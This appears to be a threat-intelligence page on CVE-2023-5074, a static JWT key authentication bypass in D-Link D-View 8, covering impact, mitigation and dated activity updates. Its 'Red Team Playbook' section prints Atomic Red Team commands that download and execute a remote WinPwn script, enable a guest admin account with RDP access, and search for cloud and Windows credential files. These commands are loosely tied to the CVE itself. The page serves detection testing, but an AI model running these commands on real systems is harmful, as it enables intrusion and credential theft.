CVE-2023-5074
Overview
This vulnerability is an authentication bypass caused by the use of a static cryptographic key to sign JSON Web Tokens (JWT) in the user authentication mechanism of D-Link D-View 8 version 2.0.1.28. The static key enables attackers to forge valid JWT tokens without proper credentials. The affected component is the JWT-based authentication system responsible for user session validation in the product.
Vulnerability Description
Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28
Impact
An attacker with network access can bypass authentication controls without any user interaction or privileges, gaining unauthorized administrative access to the D-Link D-View 8 management interface. This enables full control over device monitoring and management functions, potentially leading to data exposure, configuration manipulation, or further network compromise. The vulnerability requires no authentication (PR:N), no user interaction (UI:N), and is exploitable remotely (AV:N), as reflected in the CVSS vector.
Solution
D-Link has addressed this vulnerability in updated firmware versions beyond 2.0.1.28. Users should apply the latest patches as detailed in the Tenable advisory TRA-2023-32 available at https://www.tenable.com/security/research/tra-2023-32. The vendor recommends replacing the static JWT signing key with a secure, dynamically generated key and updating to the fixed version of D-View 8 to mitigate the authentication bypass.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with the D-Link D-View 8 version 2.0.1.28 arises from the use of a static key for protecting JSON Web Tokens (JWT) utilized in user authentication processes. JWTs are widely adopted for securely transmitting information between parties as a JSON object, but their security hinges on the confidentiality and integrity of the signing key. In this case, the reliance on a static key means that if an attacker can discover or guess this key, they can forge valid tokens. This results in an authentication bypass, allowing unauthorized access to the system without needing valid user credentials.
Attack vectors for exploiting this vulnerability are diverse and can be executed with relative ease. An attacker could leverage various techniques to discover the static key, such as reverse engineering the application, conducting a brute-force attack, or exploiting other vulnerabilities in the system that may expose sensitive information. Once the static key is obtained, the attacker can create a malicious JWT that the D-Link D-View 8 application would accept as legitimate. This could lead to unauthorized access to sensitive administrative functionalities, potentially allowing the attacker to manipulate configurations, access sensitive data, or even disrupt services.
The real-world impact of this vulnerability is significant, particularly for organizations relying on D-Link's network management solutions. An authentication bypass could lead to unauthorized changes in network configurations, exposure of sensitive information, and potential service disruptions. For businesses, this translates into not only financial losses due to operational downtime but also reputational damage and potential legal ramifications if sensitive customer data is compromised. The high CVSS score of 9.8 underscores the critical nature of this vulnerability, indicating that it poses a severe risk to any organization utilizing the affected product.
To detect and mitigate this vulnerability, organizations should first conduct a thorough assessment of their current deployments of D-Link D-View 8. Regular security audits and penetration testing can help identify instances where the static key is being used and assess the overall security posture of the application. Additionally, organizations should implement strong access controls and logging mechanisms to monitor for any unauthorized access attempts. Mitigation strategies should include updating to a version of the software that employs dynamic key management for JWTs, thereby eliminating the reliance on a static key. Furthermore, organizations should consider adopting a defense-in-depth approach, incorporating network segmentation and intrusion detection systems to further safeguard against potential exploitation.
In conclusion, the vulnerability associated with the D-Link D-View 8 application presents a critical risk due to its potential for authentication bypass through the use of a static key for JWTs. The implications of such a vulnerability are profound, affecting not only the security of the affected systems but also the broader operational integrity of organizations that depend on this software. Proactive detection and mitigation strategies are essential to safeguard against exploitation and to protect sensitive data and network configurations from unauthorized access.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2023-5074, indicating that adversaries are increasingly probing for opportunities to exploit the static JWT key vulnerability in D-Link D-View 8. While the EPSS score has declined moderately, reflecting a slight reduction in overall exploit likelihood, the emergence of new sightings underscores persistent attacker interest and active reconnaissance efforts. This divergence suggests that although widespread exploitation has not yet materialized, threat actors are actively validating the vulnerability’s utility within their toolsets. For defenders, this evolving pattern signals a critical window to enhance monitoring and response capabilities before exploitation attempts potentially escalate. The current absence of publicly available exploit details does not diminish the urgency, as the vulnerability’s critical severity and authentication bypass nature continue to pose a high risk to affected environments. Consequently, the threat level remains elevated, with the intelligence pointing toward an imminent risk of targeted attacks leveraging this weakness.
Update 2 — June 22, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2023-5074, indicating an increased interest or testing by threat actors targeting the D-Link D-View 8 vulnerability. Although the overall EPSS score shows a slight downward trend, the recent surge in telemetry signals a potential shift in adversary behavior that could precede more widespread exploitation attempts. This development is significant for defenders because it underscores a narrowing window to detect and respond before threat actors potentially integrate this authentication bypass into active campaigns. The absence of new exploit details suggests that adversaries may still be in reconnaissance or development phases, but the sharp increase in activity elevates the risk profile. Consequently, the threat level should be considered heightened, reflecting a growing likelihood of targeted attacks leveraging this critical vulnerability in the near term.
Update 3 — July 08, 2026
CSURFACE threat intelligence has identified a modest but meaningful uptick in detection activity related to CVE-2023-5074, indicating that threat actors are increasingly probing or attempting to leverage the static key vulnerability in D-Link D-View 8. While no new exploit code or publicly disclosed proof-of-concept exploits have surfaced, the sustained rise in telemetry suggests adversaries are intensifying reconnaissance efforts or conducting targeted testing within select environments. This development is significant because it signals a growing operational interest that could precede the integration of this authentication bypass into broader attack campaigns. For defenders, this evolving pattern underscores the importance of heightened vigilance and proactive monitoring, as the window for early detection before exploitation narrows. The risk assessment for CVE-2023-5074 should therefore be elevated to reflect a heightened likelihood of imminent exploitation attempts, even in the absence of confirmed widespread active exploitation.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | D-View 8 | 2.0.1.28 |
cpe:2.3:a:dlink:d-view_8:2.0.1.28:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-191 | Read Sensitive Constants Within an Executable |
31%
|
— | Low | |
| CAPEC-70 | Try Common or Default Usernames and Passwords |
30%
|
Medium | High |
Red Team Playbook
36 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
net user #{guest_user} /active:yes
sudo sysadminctl -guestAccount on
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-5074 |
| tenable.com |
GitHub CVE
|
https://www.tenable.com/security/research/tra-2023-32 |